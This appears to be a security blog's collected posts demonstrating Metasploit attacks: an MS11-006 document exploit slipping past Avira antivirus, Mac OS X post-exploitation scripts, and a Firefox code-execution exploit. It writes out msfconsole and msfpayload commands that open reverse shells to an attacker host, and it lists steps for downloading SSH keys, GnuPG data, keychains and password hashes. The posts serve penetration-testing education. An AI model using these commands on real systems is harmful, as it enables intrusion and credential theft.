This video will demonstrate you a race condition against Avira anti-virus products. This race condition is due to design errors in the Avira anti-virus products themselves.
As you will see, the installed “Avira AntiVir Personal” anti-virus will detect the attack, but to late. The meterpreter sessions is created and you have access to the system.
The demonstrated product is an update-to-date “Avira AntiVir Personal”. But this race condition appear for others Avira products, such as “Avira AntiVir Premium” and “Avira Premium Security Suite“.
Metasploit commands :
To create the msf.doc file to exploit MS11-06 vulnerability
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
To listen for incoming meterpreter sessions
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j
As always, Carlos Perez aka Dark Operator, member of the PaulDotCom crew and Metasploit developer, is inspired. A new set of post exploitation scripts have been developed and integrated in the Metasploit framework repository. These scripts permit you to gather interesting information’s on a Mac OS X target.
These Metasploit post exploitation scripts are supporting version 10.3, 10.4, 10.5, 10.6 and 10.7 of Mac OS X. For the moment are only working with a “shell” payload but Carlos is working on a version how is supporting a complete integration with meterpreter. Also Carlos is working on an iOS integration.
Mac OS X enum_osx post exploitation script
This script will permit you to gather available data types by automating the execution of the “/usr/sbin/system_profiler” command. Depending on your Mac OS X version, you will have more or less available data types. Here under some examples :
SPSoftwareDataType : Everything related to system software (system version, kernel version, boot volume, boot mode, computer name, user name, time since boot and if secure virtual memory is enabled).
SPNetworkDataType : Every thing related to the networks configurations (IPs, networks, gateways, configuration methods, proxies, Mac addresses, etc.).
SPBluetoothDataType : All informations related to the Bluetooth configuration (shared folders, authentication requirements, etc).
SPEthernetDataType : All informations related to ethernet cards (bus, vendor and device ID, vendor and device subsystem ID, revision ID, BSD name, Kext name, location and version).
SPAirPortDataType : All informations related to the Airport configuration (model, firmware version, current wireless network and channel).
SPNetworkLocationDataType : More detailed information’s on the networks configurations.
SPUSBDataType : All informations on the USB bus and connected devices.
SPPrintersDataType : All informations on local or remote configured printers.
SPFirewallDataType : All informations related to the local Firewall (Firewall mode, authorized applications, logging mode and stealth mode).
SPApplicationsDataType : All informations on all installed software’s (version, last modification date, location, etc.).
SPDeveloperToolsDataType : All informations on the installed development tools.
SPFrameworksDataType : All informations on the Apple Frameworks (version, last modification date, location, etc.).
SPStartupItemDataType : All informations on the start-up items (description, location, requirements, start-up order preferences).
SPPrefPaneDataType : All informations related to the preference panes (version, visible or not, identifier and location).
SPLogsDataType : All non rotated log files and they’re recent contents.
Also some others commands are executed to gather more information’s :
Current TCP connections (netstat -np tcp).
Current UDP connections (netstat -np udp).
Environment variables (printenv).
Last boot time (who -b).
Current activity (who).
Process list (ps -ea).
List of all users (dscacheutil -q user).
List of all groups (dscacheutil -q group).
Download the “$HOME/.ssh/” folder contain.
Download the “$HOME/.gnupg/” folder contain.
Download the “$HOME/*_history” file.
Download users configured Keychains by “/usr/bin/security list-keychains” command.
Extract and download history files.
Take a screenshot of the current session in JPEG format.
Same as for the hasdump script, if the Metasploit session is running with the Mac OS X root privileges, the SHA, LM and/or NTLM users accounts passwords hash dumps will be download.
All gathered informations are saved into a “logs/post/enum_osx/hostname-date” folder located into your “$HOME/.msf3” folder.
Metasploit enum_osx post exploitation
Mac OS X hashdump post exploitation script
As described above this script will focus only to gather the Mac OS X users accounts SHA, LM and/or NTLM passwords hash dumps, and download everything on the Metasploit station. All gathered information’s are saved into a “logs/post/enum_osx/hostname-date” folder located into your “$HOME/.msf3” folder.
Metasploit OS X hashdump post exploitation
To test these scripts you only need to create an executable payload for Mac OS X and follow these steps.
First create the payload with msfpayload and upload it to the targeted Mac OS X.
sudo msfpayload osx/ppc/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X > test
Then in msfconsole, run the following commands.
use exploit/multi/handler
set PAYLOAD osx/ppc/shell_reverse_tcp
set LHOST 192.168.178.21
exploit -j
After on the targeted Mac OS X, execute the test payload
Or you could play with a valid Mac OS X system or application exploit. Here under a PoC video.
Here is the first scenario of the Metasploit Exploitation Scenarios serie. You will find here under a SlideShare presentation and an YouTube video as demonstration of the scenario. If you have any comments or suggestions don’t hesitate.
Vulnerability discovered in the wild
Vulnerability corrected by vendor the 2010-10-27
Vulnerability & Exploit-DB PoC disclosed by unknown the 2010-10-29
Metasploit PoC released the 2011-02-17
All Firefox 3.6.x versions previous version 3.6.12
All Firefox 3.5.x versions previous version 3.5.15
All Thunderbird 3.1.x versions previous version 3.1.6
All Thunderbird 3.0.x versions previous version 3.0.10
All SeaMonkey 2.0.x versions previous version 2.0.10
Tested on Windows XP SP3 with :
Firefox 3.6.9 released the 2010-09-23
Description :
This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a metasploit port of the in-the-wild exploit.
Commands :
use exploit/windows/browser/mozilla_interleaved_write
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
